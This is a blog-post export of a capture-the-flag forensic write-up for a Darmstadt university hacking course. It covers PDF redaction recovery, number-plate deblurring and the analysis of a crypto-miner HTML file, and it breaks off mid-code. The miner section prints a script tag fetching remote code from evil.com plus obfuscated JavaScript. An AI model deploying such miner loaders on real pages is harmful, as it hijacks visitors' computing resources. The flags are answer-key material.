{"id":18389,"date":"2022-05-11T09:51:31","date_gmt":"2022-05-11T07:51:31","guid":{"rendered":"https:\/\/herolab.usd.de\/?p=18389"},"modified":"2022-05-11T09:58:30","modified_gmt":"2022-05-11T07:58:30","slug":"write-up-registration-challenge-hackercontest-summer-22","status":"publish","type":"post","link":"https:\/\/herolab.usd.de\/en\/write-up-registration-challenge-hackercontest-summer-22\/","title":{"rendered":"Write-up Registration Challenge Hackercontest Summer 22"},"content":{"rendered":"\n<p>In the summer semester of 2022, our \"Hacker Contest\" will be held again at <a href=\"https:\/\/www.tu-darmstadt.de\/\" target=\"_blank\" rel=\"noopener\">Darmstadt University (TU)<\/a> and <a href=\"https:\/\/h-da.de\/\" target=\"_blank\" rel=\"noopener\">Darmstadt University of Applied Sciences (h_da)<\/a>. In the popular course, students get real insights into IT security and gain hands-on experience with tools and methods to search for vulnerabilities in networks and systems within our <a href=\"https:\/\/herolab.usd.de\/unser-pentestlab\/\">PentestLab<\/a>.<\/p>\n\n\n\n<p>As every semester, prospective participants took on the Hacker Contest Challenge to qualify for participation.<\/p>\n\n\n\n<p>If you are curious to know what a Hacker Contest Challenge looks like, or which flags you might have missed this time: This is our sample solution for the summer semester Hacker Contest Challenge.<\/p>\n\n\n\n<p><strong>Table of Contents<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"#scenario\">Scenario<\/a><\/li><li><a href=\"#the-challenge\">The Challenge<\/a><\/li><li><a href=\"#solution\">Solution<\/a><\/li><li><a href=\"#preparation\">Preparation<\/a><\/li><li><a href=\"#flag-1-bad-pdf-redaction\">Flag 1: Bad PDF redaction<\/a><\/li><li><a href=\"#flag-2-blurred-number-plate\">Flag 2: Blurred number plate<\/a><\/li><li><a href=\"#flag-3-crypto-miner\">Flag 3: Crypto miner<\/a><\/li><li><a href=\"#flag-4-reversing-an-exploit\">Flag 4: Reversing an exploit<\/a><\/li><li><a href=\"#flag-5-php-webshell-in-image\">Flag 5: PHP webshell in image<\/a><\/li><li><a href=\"#flag-6-firefox-cookies\">Flag 6: Firefox cookies<\/a><\/li><li><a href=\"#flag-7-deleted-email\">Flag 7: Deleted Email<\/a><\/li><li><a href=\"#flag-8-stegano-\/-important-cat\">Flag 8: Stegano \/ important cat<\/a><\/li><li><a href=\"#flag-9-weak-encryption\">Flag 9: Weak Encryption<\/a><\/li><li><a href=\"#flag-10-important.gpg\">Flag 10: important.gpg<\/a><\/li><li><a href=\"#derivable-information\">Derivable Information<\/a><\/li><li><a href=\"#opsec-fails\">OPSEC - Fails<\/a><\/li><li><a href=\"#vpn-configuration\">VPN configuration<\/a><\/li><li><a href=\"#.zshrc\">.zshrc<\/a><\/li><li><a href=\"#same-username-for-different-services\">Same username for different services<\/a><\/li><\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><a id=\"scenario\"><\/a>Scenario <\/h3>\n\n\n\n<hr class=\"wp-block-separator\" \/>\n\n\n\n<p>While investigating various cyber crime cases, the investigators managed to get hold of a suspects backup containing the entire <strong>home<\/strong>\ndirectory of a foreign system. Internal analysis found neither hints about its origin nor evidence for involvement in illegal activities.\nNow the police department seeks professional help from cyber security experts to further analyze the backup.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><a id=\"the-challenge\"><\/a>The Challenge<\/h4>\n\n\n\n<p>Your task is to analyze the backup and to find additional information about its origin and evidence for potential cyber crime cases.\nDuring your analysis, you have to solve several small challenges were each solved challenge is rewarded with a flag of the following format:\n<strong>usd{&lt;20 character String&gt;}<\/strong>. In total 10 flags can be found.<\/p>\n\n\n\n<p>Additionally some configurations within the backup file indicate a threat to the <a href=\"https:\/\/en.wikipedia.org\/wiki\/Operations_security\" target=\"_blank\" rel=\"noopener\">OPSEC<\/a>. When you manage to find and list them within your solution, this will be used a tiebreake<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><a id=\"solution\"><\/a>Solution<\/h3>\n\n\n\n<hr class=\"wp-block-separator\" \/>\n\n\n\n<h4 class=\"wp-block-heading\"><a id=\"preparation\"><\/a><\/h4>\n\n\n\n<h4 class=\"wp-block-heading\">Preparation<\/h4>\n\n\n\n<p>The backup is provided as an image file. We first check the images type and when mount it within our system:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$ <\/span>file image.img\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">image.img: Linux rev 1.0 ext4 filesystem data, UUID=e07e3695-dfbd-4263-b118-6c3bb402c607 (extents) (64bit) (large files) (huge files)<\/span>\n<span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$ <\/span>mount image.img \/mnt\n<\/pre><\/div>\n\n\n\n<p>Now we can investigate the backup contents within the <strong>\/mnt<\/strong> folder.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><a id=\"flag-1-bad-pdf-redaction\"><\/a>Flag 1: Bad PDF redaction<\/h4>\n\n\n\n<p>As we already know, the backup contains a home folder. The only user folder contained within it is named <strong>jim<\/strong>. Within the\n<strong>Downloads<\/strong> folder of the backup, we find a boarding pass in <strong>PDF<\/strong> format:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host ~]$ <\/span>ls\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">ticket.pdf<\/span>\n<\/pre><\/div>\n\n\n\n<p>The contents of ticket.pdf:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/05\/ticket.png\" alt=\"Boarding pass\" \/><\/figure>\n\n\n\n<p>Parts of the pdf are overlaid and no longer readable. \nHowever, just using the mouse to mark the redacted parts and copying them into the\nclipboard reveals their contents. An alternate approach is <strong>pdftotext<\/strong>:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host \/mnt\/home\/jim\/Downloads]$ <\/span>pdftotext ticket.pdf\n<span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host \/mnt\/home\/jim\/Downloads]$ <\/span>cat ticket.txt\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">...&lt;SNIP&gt;...<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">USD{94CE3A<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">47F3B9CC4F<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">4BBF}<\/span>\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">...&lt;SNIP&gt;...<\/span>\n<\/pre><\/div>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><a id=\"flag-2-blurred-number-plate\"><\/a>Flag 2: Blurred number plate<\/h4>\n\n\n\n<p>The <strong>Pictures<\/strong> folder contains a <strong>PNG<\/strong> image file: <\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host \/mnt\/home\/jim]$ <\/span>ls Pictures\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">bought.png<\/span>\n<\/pre><\/div>\n\n\n\n<p>The image shows a car, but the number plate is blurred.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/05\/car_small.png\" alt=\"The car\" \/><\/figure>\n\n\n\n<p>The blurring happens in a straight line which means a horizontal (motion) blur was applied. Recovering the original image can\nbe done using different tools like <strong>gimp<\/strong> or <strong>photoshop<\/strong>, or by using image manipulation libraries. For this write-up,\nwe use the <strong>skimage<\/strong> (<strong>pip install scikit-image<\/strong>) python library. Because we know that a horizontal blur is used,  we can approximate the blurring kernel with a \n<strong>3 x n<\/strong> matrix like this:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span>\n    <span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">...<\/span> <span class=\"p\" style=\"background: #263238;color: #89DDFF\">],<\/span>\n    <span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">...<\/span> <span class=\"p\" style=\"background: #263238;color: #89DDFF\">],<\/span>\n    <span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">...<\/span> <span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span>\n<span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span>\n<\/pre><\/div>\n\n\n\n<p>First we need to crop the image such that only the plate is visible:\n<img decoding=\"async\" alt=\"Blurred Number Plate\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/05\/plate_only.png\"><\/p>\n\n\n\n<p>All that's left is to find out an appropriate value for n.<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"kn\" style=\"background: #263238;color: #89DDFF;font-style: italic\">import<\/span> <span class=\"nn\" style=\"background: #263238;color: #FFCB6B\">time<\/span>\n<span class=\"kn\" style=\"background: #263238;color: #89DDFF;font-style: italic\">import<\/span> <span class=\"nn\" style=\"background: #263238;color: #FFCB6B\">numpy<\/span> <span class=\"k\" style=\"background: #263238;color: #BB80B3\">as<\/span> <span class=\"nn\" style=\"background: #263238;color: #FFCB6B\">np<\/span>\n<span class=\"kn\" style=\"background: #263238;color: #89DDFF;font-style: italic\">from<\/span> <span class=\"nn\" style=\"background: #263238;color: #FFCB6B\">PIL<\/span> <span class=\"kn\" style=\"background: #263238;color: #89DDFF;font-style: italic\">import<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">Image<\/span>\n<span class=\"kn\" style=\"background: #263238;color: #89DDFF;font-style: italic\">from<\/span> <span class=\"nn\" style=\"background: #263238;color: #FFCB6B\">skimage.io<\/span> <span class=\"kn\" style=\"background: #263238;color: #89DDFF;font-style: italic\">import<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">imsave<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">imread<\/span>\n<span class=\"kn\" style=\"background: #263238;color: #89DDFF;font-style: italic\">from<\/span> <span class=\"nn\" style=\"background: #263238;color: #FFCB6B\">skimage<\/span> <span class=\"kn\" style=\"background: #263238;color: #89DDFF;font-style: italic\">import<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">color<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">data<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">restoration<\/span>\n<span class=\"c1\" style=\"background: #263238;color: #546E7A;font-style: italic\">#convert the cropped image of the plate to grayscale<\/span>\n<span class=\"n\" style=\"background: #263238;color: #EFF\">img<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">color<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">rgb2gray<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">imread<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'plate_only.png'<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>      \n<span class=\"c1\" style=\"background: #263238;color: #546E7A;font-style: italic\">#test various lengths of the kernel<\/span>\n<span class=\"k\" style=\"background: #263238;color: #BB80B3\">for<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">motion_blur_len<\/span> <span class=\"ow\" style=\"background: #263238;color: #89DDFF;font-style: italic\">in<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">range<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">3<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"mi\" style=\"background: #263238;color: #F78C6C\">70<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">):<\/span>                \n    <span class=\"c1\" style=\"background: #263238;color: #546E7A;font-style: italic\">#create the kernel<\/span>\n    <span class=\"n\" style=\"background: #263238;color: #EFF\">psf<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">np<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">zeros<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">3<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">motion_blur_len<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span>            \n    <span class=\"n\" style=\"background: #263238;color: #EFF\">psf<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">np<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">ones<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">motion_blur_len<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span>\n    <span class=\"c1\" style=\"background: #263238;color: #546E7A;font-style: italic\">#use the wiener filter to deblur the image with chosen kernel<\/span>\n    <span class=\"n\" style=\"background: #263238;color: #EFF\">deconvolved_img<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">_<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">restoration<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">unsupervised_wiener<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">img<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">psf<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span>      \n    <span class=\"n\" style=\"background: #263238;color: #EFF\">imsave<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'deblur_auto.png'<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">deconvolved_img<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span>\n    <span class=\"n\" style=\"background: #263238;color: #EFF\">image<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">Image<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">open<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'deblur_auto.png'<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span>\n    <span class=\"n\" style=\"background: #263238;color: #EFF\">image<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">show<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">()<\/span>\n    <span class=\"n\" style=\"background: #263238;color: #EFF\">time<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">sleep<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">2<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span>\n<\/pre><\/div>\n\n\n\n<p>Deblurred Number Plate with kernel length 10:\n<img decoding=\"async\" alt=\"Deblurred Number Plate\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/05\/deblur_10.png\"><\/p>\n\n\n\n<p>Deblurred Number Plate with kernel length 30:\n<img decoding=\"async\" alt=\"Deblurred Number Plate\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/05\/deblur_30.png\"><\/p>\n\n\n\n<p>Deblurred Number Plate with kernel length 60:\n<img decoding=\"async\" alt=\"Deblurred Number Plate\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/05\/deblur_60.png\"><\/p>\n\n\n\n<p>Deblurred Number Plate with kernel length 68:\n<img decoding=\"async\" alt=\"Deblurred Number Plate\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/05\/deblur_auto.png\"><\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><a id=\"flag-3-crypto-miner\"><\/a>Flag 3: Crypto miner<\/h4>\n\n\n\n<p>Inside the <strong>\/mnt\/home\/jim\/tools\/<\/strong> directory we find amoung other files and directory a <strong>html<\/strong> file <strong>miner.html<\/strong> containing heavily obfuscated javascript.<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"gp\" style=\"background: #263238;color: #FFCB6B\">[student@host \/mnt\/home\/jim]$ <\/span>ls tools\n<span class=\"go\" style=\"background: #263238;color: #546E7A\">cat  ghidra  john  miner.html  PayloadsAllTheThings<\/span>\n<\/pre><\/div>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">&lt;<\/span><span class=\"nt\" style=\"background: #263238;color: #FF5370\">script<\/span> <span class=\"na\" style=\"background: #263238;color: #BB80B3\">src<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"s\" style=\"background: #263238;color: #C3E88D\">\"https:\/\/evil.com\/mminer.min.js\"<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">&gt;&lt;\/<\/span><span class=\"nt\" style=\"background: #263238;color: #FF5370\">script<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span>\n<span class=\"p\" style=\"background: #263238;color: #89DDFF\">&lt;<\/span><span class=\"nt\" style=\"background: #263238;color: #FF5370\">script<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"kd\" style=\"background: #263238;color: #BB80B3\">function<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x181de6<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x97d6c1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"kd\" style=\"background: #263238;color: #BB80B3\">function<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x5a1f8c<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x8b9ffd<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x2126bd<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0xa32fd3<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">return<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x2c53<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0xa32fd3<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0xb7<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x8b9ffd<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">);}<\/span><span class=\"kd\" style=\"background: #263238;color: #BB80B3\">function<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x3c934c<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x49541c<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x227bb7<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x956b30<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">return<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x2c53<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x49541c<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0x1e7<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x227bb7<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">);}<\/span><span class=\"kd\" style=\"background: #263238;color: #BB80B3\">function<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x2df767<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x2f4cf8<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x2c71f7<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x4e7cbc<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">return<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x2c53<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x4e7cbc<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0x3be<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x2f4cf8<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">);}<\/span><span class=\"kd\" style=\"background: #263238;color: #BB80B3\">function<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x3545a8<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x22a5e1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x248fa6<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0xdf02f4<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">return<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x2c53<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x22a5e1<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0x167<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0xdf02f4<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">);}<\/span><span class=\"kd\" style=\"background: #263238;color: #BB80B3\">function<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x409406<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x24cba3<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x382575<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x321626<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">return<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x2c53<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x24cba3<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0x1c9<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x382575<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">);}<\/span><span class=\"kd\" style=\"background: #263238;color: #BB80B3\">var<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x2957d9<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x181de6<\/span><span class=\"p\" style=\"background: #263238;color: 